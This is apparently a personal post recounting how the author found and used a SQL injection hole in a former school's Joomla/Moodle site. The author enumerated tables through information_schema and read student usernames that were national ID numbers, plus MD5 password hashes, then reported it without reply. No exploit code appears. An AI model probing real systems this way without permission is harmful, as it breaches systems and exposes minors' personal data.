So.

Found a SQL Injection vulnerability in my ex-secondary (That's high school for you Americans out there) school's website.

Crafted a query to get one column name,table name and schema from the entire database using information_schema.columns

Came across a mdl_user table (school was using Joomla,with a Moodle module). Chock full of users - the entire school uses the moodle module for e-learning, so every single student was in there.

Simple guessing came out with the username and password columns. (NB:No prefixes ;)

Checked that out - remember,SQL injection hole - and the username were IC numbers. (The American counterpart would be the Social Security Numbers).

So, there were storing sensitive data, IN CLEARTEXT, as usernames. If I were a identity stealer I would have been in Nirvana. Well,close, in any case, though I can't imagine why would you need to impersonate a high schooler.

Anyway, password was MD5 hashed (moodle module remember.If it was developed inhouse it probably would have been in cleartext as well, going by what I've seen so far),but found that many users had the same password.

So, digged in further the website. Went to the moodle main page. And lo and behold, on the login page, "All student accounts have been reset on January 15th with the password \"password\""

Do they seriously expect 15-year olds to bother about changing their default passwords in a school e-learning portal? At least generate random passwords or something.

So, fired an email to the school's sysadmin, and about five days later, no reply. Hole's still there.

Oh well.